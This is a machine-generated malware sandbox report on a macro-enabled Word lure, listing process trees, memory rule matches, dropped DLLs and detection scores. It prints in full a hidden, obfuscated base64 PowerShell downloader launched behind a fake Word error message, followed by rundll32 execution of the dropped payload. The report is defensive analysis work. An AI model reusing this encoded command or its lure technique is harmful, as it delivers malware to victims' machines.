Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002026F5	11_2_002026F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F1CFA	11_2_001F1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002020C5	11_2_002020C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F88E5	11_2_001F88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00208ADC	11_2_00208ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001FB112	11_2_001FB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00200D33	11_2_00200D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F153C	11_2_001F153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00207D03	11_2_00207D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001FBB3A	11_2_001FBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001FF536	11_2_001FF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00200F0C	11_2_00200F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00202B16	11_2_00202B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0020511B	11_2_0020511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00208D1C	11_2_00208D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00205D1D	11_2_00205D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00207F1F	11_2_00207F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001FB75F	11_2_001FB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00200B68	11_2_00200B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F6754	11_2_001F6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00201773	11_2_00201773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00209B45	11_2_00209B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F5B79	11_2_001F5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F8F78	11_2_001F8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001FE377	11_2_001FE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00202349	11_2_00202349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00208F49	11_2_00208F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001FC769	11_2_001FC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F6D9F	11_2_001F6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F839D	11_2_001F839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F7998	11_2_001F7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002073AC	11_2_002073AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001FF98C	11_2_001FF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002061B8	11_2_002061B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00206DB9	11_2_00206DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00209586	11_2_00209586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0020878F	11_2_0020878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F17AC	11_2_001F17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F69A0	11_2_001F69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002031E2	11_2_002031E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001F9FDC	11_2_001F9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00203FE7	11_2_00203FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002067E9	11_2_002067E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002071EF	11_2_002071EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001FD7EB	11_2_001FD7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00201BDF	11_2_00201BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A2C63	12_2_006A2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AEE78	12_2_006AEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AB41F	12_2_006AB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B02C3	12_2_006B02C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AC0C6	12_2_006AC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B42DA	12_2_006B42DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A568E	12_2_006A568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B3895	12_2_006B3895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A7B63	12_2_006A7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B4B41	12_2_006B4B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A8736	12_2_006A8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B63C1	12_2_006B63C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B5A61	12_2_006B5A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B687F	12_2_006B687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AEA4C	12_2_006AEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AF444	12_2_006AF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AE05A	12_2_006AE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A2A30	12_2_006A2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A9A37	12_2_006A9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A4A35	12_2_006A4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B340A	12_2_006B340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B7A0F	12_2_006B7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B12E2	12_2_006B12E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A88E5	12_2_006A88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A1CFA	12_2_006A1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B26F5	12_2_006B26F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A96CD	12_2_006A96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B20C5	12_2_006B20C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B8ADC	12_2_006B8ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006BA0AF	12_2_006BA0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A62A3	12_2_006A62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A80BA	12_2_006A80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A60B9	12_2_006A60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A48BD	12_2_006A48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A1280	12_2_006A1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B889D	12_2_006B889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AC769	12_2_006AC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B0B68	12_2_006B0B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A8F78	12_2_006A8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A5B79	12_2_006A5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B1773	12_2_006B1773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AE377	12_2_006AE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B2349	12_2_006B2349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B8F49	12_2_006B8F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B9B45	12_2_006B9B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AB75F	12_2_006AB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A6754	12_2_006A6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006ABB3A	12_2_006ABB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A153C	12_2_006A153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B0D33	12_2_006B0D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AF536	12_2_006AF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B0F0C	12_2_006B0F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B7D03	12_2_006B7D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B511B	12_2_006B511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B7F1F	12_2_006B7F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B5D1D	12_2_006B5D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B8D1C	12_2_006B8D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AB112	12_2_006AB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B2B16	12_2_006B2B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AD7EB	12_2_006AD7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B67E9	12_2_006B67E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B71EF	12_2_006B71EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B31E2	12_2_006B31E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B3FE7	12_2_006B3FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B1BDF	12_2_006B1BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A9FDC	12_2_006A9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A17AC	12_2_006A17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B73AC	12_2_006B73AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A69A0	12_2_006A69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B6DB9	12_2_006B6DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B61B8	12_2_006B61B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B878F	12_2_006B878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AF98C	12_2_006AF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006B9586	12_2_006B9586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006A7998	12_2_006A7998

Source: info_2020_NJY_31940448.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module Xlb0g5eyj545, Function Document_open			Name: Document_open

Source: info_2020_NJY_31940448.doc

OLE indicator, VBA macros: true

Source: Joe Sandbox View

Dropped File: C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll BBB9C1B98EC307A5E84095CF491F7475964A698C90B48A9D43490A05B6BA0A79

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10029D17 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10026566 appears 66 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100040F0 appears 118 times

Source: 00000005.00000002.2103844038.00000000003F6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2103894665.0000000001C16000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: R43H.dll.5.dr

Static PE information: Section: .rsrc ZLIB complexity 0.995798093463

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@26/7@1/2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: CreateServiceW,

10_2_002454FE

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$fo_2020_NJY_31940448.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDDFF.tmp

Jump to behavior

Source: info_2020_NJY_31940448.doc

OLE indicator, Word Document stream: true

Source: info_2020_NJY_31940448.doc	OLE document summary: title field not present or empty
Source: info_2020_NJY_31940448.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ........................................ .>.......>.............`.......................#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................D.j......................J.............}..v....X.......0.u.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................D.j..... J...............J.............}..v............0.u...............b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................E.j......................J.............}..v............0.u.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................E.j......b...............J.............}..v....H.......0.u...............b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..............._E.j......................J.............}..v.....+......0.u.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..............._E.j..... J...............J.............}..v.....,......0.u.............X.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............oz.j....E.................J.............}..v............0.u...............b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....+...............oz.j....E.................J.............}..v............0.u...............b.............................	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL

Source: info_2020_NJY_31940448.doc	Virustotal: Detection: 65%
Source: info_2020_NJY_31940448.doc	Metadefender: Detection: 41%
Source: info_2020_NJY_31940448.doc	ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Slimgulabo\vhtbjtkrz.lpr',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bvjuzxolryfk\tucwdqbdtfe.wnx',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bsmdm\ghwk.vcj',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Anheubolw\yblyupae.she',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bwaqczxvcucs\mfqhcresmvq.yyb',Control_RunDLL
